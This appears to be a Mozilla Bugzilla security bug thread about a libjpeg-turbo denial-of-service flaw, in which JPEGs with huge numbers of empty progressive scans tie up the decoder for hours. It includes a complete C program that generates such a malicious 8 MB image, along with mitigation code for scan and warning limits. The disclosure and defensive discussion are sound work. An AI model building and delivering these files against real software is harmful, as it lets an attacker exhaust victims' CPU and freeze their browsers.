Open Bug 1252196 Opened 9 years ago Updated 2 years ago

libjpeg-turbo: DoS via progressive image decoding

Categories

(Core :: Graphics: ImageLib, defect, P3)



People

(Reporter: jaas, Unassigned)

References

Details

(Keywords: csectype-dos, sec-low, Whiteboard: [gfx-noted])

Attachments

(2 files)

When the decoder hits a marker while an arithmetically-encoded scan is being decoded, all subsequent requests by the arithmetic decoder for more input data are fulfilled with zero bytes until the scan is complete. An attacker can use this to cause relatively long processing times with very small inputs. More specifically, by supplying only SOI, DQT, SOF, and SOS markers without any image data, the attacker can cause libjpeg-turbo to decode a whole scan with attacker-chosen dimensions (possibly limited by the application). On its own this is not very interesting, because the CPU usage is bounded by the dimensions of the frame. However, a progressive, arithmetically-encoded frame can contain multiple scans, each of which is only 10 bytes long if it consists solely of an SOS marker. Because libjpeg-turbo permits an arbitrary number of scans per image, this can be used to increase the processing time per image linearly with the file size.

For high CPU usage, decode_mcu_DC_refine() must be selected as the decode_mcu handler; the other handlers have fast paths for input stuffed with zero bytes. Therefore Ah must be non-zero and Ss must be zero.

The following code constructs a JPG file with 8192x8192 dimensions and 8 MB in size, saves it to disk, and attempts to load it via libjpeg-turbo: [DRC to supply link to relevant source]

This case is detected and reported via a JWRN_BOGUS_PROGRESSION warning. However, the library does not treat it as an error by default and fully decodes every scan, causing tjDecompress2() to run for 6 hours (tested on an Intel i7 processor). It is recommended to either abort on bogus progression or, if error tolerance is desired, skip the decoding of bogus scans that do not supply additional information.
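Since the report's reference code isn't linked above, here is a rough sketch (not the attached test003.c and not the Cure53 code) of how such a file could be constructed. The marker layout follows ITU-T T.81; the exact byte values, output file name, and scan count are illustrative assumptions. It emits SOI, a quantization table, a progressive arithmetic SOF10 for an 8192x8192 single-component image, one DC first scan, and then roughly 800,000 ten-byte DC-refinement SOS segments (Ss = 0, Ah != 0) with no entropy-coded data between them:

/* Sketch only: builds an ~8 MB progressive, arithmetic-coded JPEG whose
 * scans contain no entropy-coded data.  Repeated DC-refinement scans with
 * the same Ah/Al trigger JWRN_BOGUS_PROGRESSION warnings but are still
 * decoded by default, which is the behavior described above. */
#include <stdio.h>
#include <string.h>

static void put(FILE *f, const unsigned char *p, size_t n)
{
  fwrite(p, 1, n, f);
}

int main(void)
{
  const unsigned char soi[]   = { 0xFF, 0xD8 };                   /* SOI */
  unsigned char dqt[69]       = { 0xFF, 0xDB, 0x00, 0x43, 0x00 }; /* DQT, 8-bit table 0 */
  const unsigned char sof10[] = {                                 /* SOF10: progressive, arithmetic */
    0xFF, 0xCA, 0x00, 0x0B, 0x08,                                 /* 8-bit precision */
    0x20, 0x00, 0x20, 0x00,                                       /* 8192 x 8192 */
    0x01, 0x01, 0x11, 0x00                                        /* 1 component, 1x1 sampling, Tq = 0 */
  };
  const unsigned char sos_dc_first[]  =                           /* DC first scan: Ss=0, Se=0, Ah=0, Al=1 */
    { 0xFF, 0xDA, 0x00, 0x08, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01 };
  const unsigned char sos_dc_refine[] =                           /* DC refinement: Ss=0, Se=0, Ah=1, Al=0 */
    { 0xFF, 0xDA, 0x00, 0x08, 0x01, 0x01, 0x00, 0x00, 0x00, 0x10 };
  const unsigned char eoi[]   = { 0xFF, 0xD9 };                   /* EOI */
  long i;

  FILE *f = fopen("dos_progressive.jpg", "wb");                   /* illustrative file name */
  if (!f) return 1;

  memset(dqt + 5, 1, 64);                                         /* flat quantization table */
  put(f, soi, sizeof soi);
  put(f, dqt, sizeof dqt);
  put(f, sof10, sizeof sof10);
  put(f, sos_dc_first, sizeof sos_dc_first);
  for (i = 0; i < 800000L; i++)                                   /* ~800,000 scans * 10 bytes = ~8 MB */
    put(f, sos_dc_refine, sizeof sos_dc_refine);
  put(f, eoi, sizeof eoi);

  fclose(f);
  return 0;
}

Loading the resulting file through a normal libjpeg-turbo decompression path should reproduce the long decode times described above.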
NOTE: The bug description above is largely cribbed from a recent security audit report by Cure53. I asked Josh to post it as a Mozilla bug in order to get input from other developers, since I don't quite know how to solve it upstream without breaking backward compatibility with the libjpeg API. The bug affects Firefox (see below.)

LJT-01-003: Pathological JPEG causes the decoder to spin for hours (affects libjpeg and all derivatives thereof)

The Cure53 report identified this as a bug in the TurboJPEG API when decoding arithmetic-coded JPEG images. Mozilla uses neither of those features. However, the report's description of the issue was too narrow in scope. When I researched the issue further, I discovered that it is also easily reproducible through the underlying libjpeg API and with progressive Huffman-coded images. Using the attached program (test003.c) with "#define ARI" commented out, you can make decode_mcu_AC_refine() in jdphuff.c spin for hours. Commenting/uncommenting different values of sos[] will similarly make decode_mcu_AC_first(), decode_mcu_DC_refine(), or decode_mcu_DC_first() spin for hours.

It is easy enough to change the behavior of the libjpeg API so that it treats warnings as fatal, but doing so would introduce a backward incompatibility, so it isn't a very palatable solution. The Cure53 report recommended introducing a "fast path" into the handler functions to handle input stuffed with long runs of zeroes. However, given that I have very little understanding of the progressive Huffman codec in general, I'm not sure how such a fast path could be crafted.
Summary: libjpeg-turbo: DoS via progressive, arithmetic image decoding → libjpeg-turbo: DoS via progressive image decoding
To elaborate on why making warnings fatal by default isn't a very palatable solution: libjpeg has traditionally (and by "traditionally", I mean since the early 90's) handled warnings by calling emit_message() in the error handler but continuing to process the image. Lots of programs (particularly image viewers and such) rely on this behavior, because it allows them to decode as much of a corrupt image as possible. However, as pointed out by the Cure53 report, it also opens a couple of exploits (this one and https://bugzilla.mozilla.org/show_bug.cgi?id=1252200).

Changing the default behavior would effectively change the behavior of the libjpeg API, because the API would then call back the error_exit() function in the error handler when a warning is encountered, instead of the emit_message() function. Any program is already free to make warnings fatal, simply by implementing its own error handler and causing any call to emit_message() to trigger the same application behavior as error_exit(). However, most programs don't do that. Most programs either use the "stock" error handler (jpeg_std_error()) or write their own that doesn't treat warnings as fatal, so most programs will be affected by this issue.

Thus, it would be very desirable to craft a fix that works around the issue in such a way that:

(a) The default behavior of the libjpeg API is unchanged (thus, applications won't suddenly discover that error_exit() is being called when it previously wasn't.)

(b) All applications receive the fix, regardless of whether they are using a custom error handler or the default one.
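For reference, a minimal sketch of what "making warnings fatal" looks like on the application side, assuming the usual setjmp/longjmp pattern from libjpeg's example.c; the struct and function names (my_error_mgr, my_error_exit, my_emit_message) are illustrative:

#include <setjmp.h>
#include <jpeglib.h>

struct my_error_mgr {
  struct jpeg_error_mgr pub;   /* fields required by libjpeg */
  jmp_buf setjmp_buffer;       /* for returning control to the caller on error */
};

static void my_error_exit(j_common_ptr cinfo)
{
  struct my_error_mgr *err = (struct my_error_mgr *)cinfo->err;
  (*cinfo->err->output_message)(cinfo);
  longjmp(err->setjmp_buffer, 1);
}

/* libjpeg calls emit_message() with msg_level == -1 for warnings;
 * escalating those to error_exit() makes warnings fatal. */
static void my_emit_message(j_common_ptr cinfo, int msg_level)
{
  if (msg_level < 0)
    my_error_exit(cinfo);
}

/* Typical setup (decompression loop and cleanup omitted):
 *
 *   struct jpeg_decompress_struct cinfo;
 *   struct my_error_mgr jerr;
 *
 *   cinfo.err = jpeg_std_error(&jerr.pub);
 *   jerr.pub.error_exit = my_error_exit;
 *   jerr.pub.emit_message = my_emit_message;
 *   if (setjmp(jerr.setjmp_buffer)) {
 *     jpeg_destroy_decompress(&cinfo);
 *     return;   // a warning or error occurred
 *   }
 *   jpeg_create_decompress(&cinfo);
 *   ...
 */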
Group: core-security → gfx-core-security
Whiteboard: [gfx-noted]
NOTE: The symptoms of this issue manifest in Firefox as follows: Take the image generated by test003.c with "#define ARI" commented out and attempt to open it in Firefox using the appropriate file:/// URL. On my Mac, running Firefox 44.0.2, Firefox starts eating up two cores' worth of CPU time. Closing the tab in which the JPEG is decoding doesn't cause the high CPU usage to go away. I have to force quit the application in order to get it to stop eating up the CPU.
(however, while it's eating up the CPU, I can still use Firefox to open other tabs, etc.)
Cribbing this comment from the other bug report, since it's really more applicable to this bug:

(In reply to Josh Aas)
> It seems to me that if we want to fix the insecure behavior for as many
> folks as possible we'd need libjpeg-turbo to break backwards compat and
> treat warnings as errors. If we end up feeling that breaking backwards
> compat is necessary then calling error_exit() in the default handler
> obviously won't fix things for people with custom handlers, but I'm not sure
> how we could fix things for them without essentially ignoring the handlers
> (I just don't know enough about the handler impl, maybe DRC knows a way).

I'm hoping that maybe there's a way to fix this algorithmically, so that the codec detects this specific situation and trips an error, but I may be dreaming. I don't know whether there is any specified limit to the number of scans in a progressive Huffman or arithmetic file, but the file generated by test003.c has about 800,000 scans. That definitely seems excessive. :)

Also, the last sentence in the Cure53 description says: "if error tolerance is desired here, skip the decoding of bogus scans that do not supply additional information." That seems like a winning idea, but I'm not sure how to do it.

> Is there a way to limit the breakage by only doing error_exit() for certain
> more dangerous types of errors?

These are the warnings that are generated (many, many times) by this particular bug:

If using progressive Huffman:

jdhuff.c:380 -- Corrupt JPEG data: premature end of data segment (JWRN_HIT_MARKER) (appears always)
jdphuff.c:143 -- Inconsistent progression sequence for component 0 coefficient 0 (JWRN_BOGUS_PROGRESSION) (appears only if using the first or second sos[] value in test003.c)
jdphuff.c:147 -- Inconsistent progression sequence for component 0 coefficient 1 (JWRN_BOGUS_PROGRESSION) (appears only if using the first or third sos[] value in test003.c)

If using arithmetic:

jdarith.c:663 -- Inconsistent progression sequence for component 0 coefficient 0 (JWRN_BOGUS_PROGRESSION) (appears if using the first or second sos[] value in test003.c)
jdarith.c:667 -- Inconsistent progression sequence for component 0 coefficient 1 (JWRN_BOGUS_PROGRESSION) (appears if using the first or third sos[] value in test003.c)

Note that if using the fourth value of sos[], along with arithmetic coding, *no* warning appears (ugh.) That may not matter for Mozilla, since you guys aren't using arithmetic decoding, but from the point of view of fixing this in libjpeg-turbo, it seems that we can't always rely on warnings to tell us that this bug is occurring. Yet another reason why an algorithmic solution is desirable. Also, treating the JWRN_HIT_MARKER warning at jdhuff.c:380 as an error would really defeat the purpose of fault tolerance-- that is the warning most often encountered when an image viewer tries to decode a corrupt JPEG and wants to display as much of the image as possible.

> The only other alternative I can think of is to use the API extension
> mechanism to introduce a flag toggling behavior for the default handler. You
> could do it either way - break backwards compat and let people restore it
> easily with the flag, or leave backwards compat and let people get the
> secure behavior by setting the flag.

We might have to resort to that.
If we did, then it would mean that applications wouldn't automatically inherit the fix, but maybe that's OK, because it seems like this is mainly going to be a concern for browsers and such. Standalone image viewers/editors/converters will probably want to keep the existing behavior, so they can decode as much of a corrupt JPEG as possible, and if someone tries to run this pathological 800,000-scan JPEG through ImageMagick, they'll wait 30 seconds and Ctrl-C it, so no harm done.

If we modified the behavior of the default emit_message() function, that should catch *most* applications. Even if an application uses its own error manager, it's very rare for it to override emit_message(), and if it does, then it is that application's responsibility to decide whether to treat warnings as errors or not. For this specific bug, it would even be possible to set a warning limit-- even something as high as 100-- after which warnings would be treated as errors (see the sketch below). However, that wouldn't fix the other bug (https://bugzilla.mozilla.org/show_bug.cgi?id=1252200, AKA LJT-01-004), because that other bug only causes one warning to be triggered (JWRN_HIT_MARKER at jdhuff.c:380).
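A minimal sketch of that warning-limit idea, assuming the application (or the default error manager) overrides emit_message() as described above; MAX_WARNINGS and limited_emit_message are illustrative names, and the threshold is a policy choice:

#include <jpeglib.h>

#define MAX_WARNINGS 100   /* illustrative threshold */

static void limited_emit_message(j_common_ptr cinfo, int msg_level)
{
  struct jpeg_error_mgr *err = cinfo->err;

  if (msg_level < 0) {
    /* Count corrupt-data warnings, as the stock emit_message() does. */
    if (err->num_warnings++ >= MAX_WARNINGS)
      (*err->error_exit)(cinfo);       /* too many warnings: treat as fatal */
    else if (err->trace_level >= 1)
      (*err->output_message)(cinfo);
  } else if (err->trace_level >= msg_level) {
    (*err->output_message)(cinfo);     /* ordinary trace message */
  }
}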
Further research has led to the discovery that this issue can be triggered by a completely valid progressive Huffman-encoded JPEG image that causes no warnings whatsoever to be issued by libjpeg. The attached program (test003c.c) generates such an image by taking advantage of the "EOB run" feature in progressive JPEGs, which allows a couple of bytes of Huffman-encoded input to represent up to 32767 MCU blocks' worth of zeroes. Thus, each 8192x8192-coefficient scan in the image can be represented using only 90 bytes. The image begins with a single DC scan, in order to avoid the JWRN_BOGUS_PROGRESSION warnings. DC scans cannot use the EOB run feature, so that scan occupies 8192 * 8192 / 64 / 4 = 262,144 bytes, but that still leaves room for nearly 80,000 AC scans of about 100 bytes each. This is an order of magnitude fewer scans than in the original test image, but it's still enough to make libjpeg spin for nearly 10 minutes while decoding the image. And, of course, this will scale almost linearly with the size of the input image-- 16 MB would make the decoder spin for 20 minutes, 32 MB would make it spin for 40 minutes, etc.

It has already been demonstrated that it's very easy to trigger this issue in the arithmetic decoder without triggering any warnings. These new findings show that it is more difficult, but still possible, to trigger the issue in the progressive Huffman decoder without triggering any warnings. While the severity of the issue is greatly reduced by using a valid JPEG image, it's still the case that 100 bytes of input cause the decoder to generate a 64-megapixel output scan (in the invalid JPEG image, this was accomplished using 10 bytes.) I don't think that there is any way around that, since the decoder is required to fill the output scan with zeroes in order to comply with the JPEG specification. Whereas the original test images were producing computation on the order of 10 minutes per megabyte of input data, the new image produces computation on the order of 1 minute per megabyte of input data, but that's still ridiculous.

I now believe that there is no legitimate way to work around this without placing some sane limit on the number of scans in a progressive image, and what that limit should be is probably best decided by individual applications. It should be straightforward to extend the API to accommodate this new "max scans" parameter.

Note that this issue is - AFAICT - unaddressed in the standard (or in libjpeg-turbo, given the lack of consensus about how to proceed.) https://libjpeg-turbo.org/pmwiki/uploads/About/TwoIssueswiththeJPEGStandard.pdf was authored to draw attention to this issue.

Group: gfx-core-security
Keywords: csectype-dos
QA Whiteboard: qa-not-actionable

In the process of migrating remaining bugs to the new severity system, the severity for this bug cannot be automatically determined. Please retriage this bug using the new severity system.

Severity: major → --

This isn't really a bug per se. What's happening is that a compression feature of the progressive JPEG format-- the ability to represent large runs of zeroes using a very small amount of data-- is being exploited to generate a relatively small JPEG file that contains an unreasonable number of scans (tens or hundreds of thousands), so the amount of time the file takes to decompress is unreasonable relative to its size.

djpeg in libjpeg-turbo 2.1.x has a -maxscans argument that demonstrates how to limit the number of progressive scans to a reasonable number, thus working around this issue. Per my comments above, I believe that that is the most appropriate way for browsers to work around it. (You should also consider making libjpeg API warnings fatal, because that decreases the attack surface for this and other issues. djpeg in libjpeg-turbo 2.1.x demonstrates how to do that as well.)

Per above, it is possible to create a perfectly valid progressive JPEG image that exhibits this issue, because the JPEG format places no limit on the number of scans. Thus, it is incumbent upon applications to work around it by refusing to decompress images beyond a certain reasonable number of scans. Even a limit of 1000 scans effectively works around the issue, and I dare you to find a legitimate JPEG image with that many scans. (Note that the TJFLAG_LIMITSCANS flag in the TurboJPEG API, which is used by libjpeg-turbo's OSS-Fuzz targets, implements a scan limit of 500.)
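For applications using the libjpeg API directly, a scan limit can be enforced with buffered-image mode, in the spirit of djpeg's -maxscans option (the actual djpeg code may differ). This is a sketch only: MAX_SCANS, the function name, and the error-handling strategy are illustrative assumptions, and the caller is assumed to have installed an error manager and to call jpeg_destroy_decompress() afterward.

#include <jpeglib.h>

#define MAX_SCANS 1000   /* far more than any legitimate progressive JPEG uses */

static int decode_with_scan_limit(struct jpeg_decompress_struct *cinfo)
{
  JSAMPARRAY row;

  if (jpeg_read_header(cinfo, TRUE) != JPEG_HEADER_OK)
    return -1;

  cinfo->buffered_image = TRUE;              /* decode one scan at a time */
  if (!jpeg_start_decompress(cinfo))
    return -1;

  row = (*cinfo->mem->alloc_sarray)((j_common_ptr)cinfo, JPOOL_IMAGE,
    cinfo->output_width * cinfo->output_components, 1);

  while (!jpeg_input_complete(cinfo)) {
    if (cinfo->input_scan_number > MAX_SCANS)
      return -1;                             /* refuse pathological images */

    jpeg_start_output(cinfo, cinfo->input_scan_number);
    while (cinfo->output_scanline < cinfo->output_height)
      jpeg_read_scanlines(cinfo, row, 1);    /* real code would consume the pixels */
    jpeg_finish_output(cinfo);
  }
  return jpeg_finish_decompress(cinfo) ? 0 : -1;
}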

Severity: -- → S3
See Also: → 1823614

Filed bug 1823614 to give us a finite limit on the number of scans. Not sure whether there are additional or separate problems here beyond that.

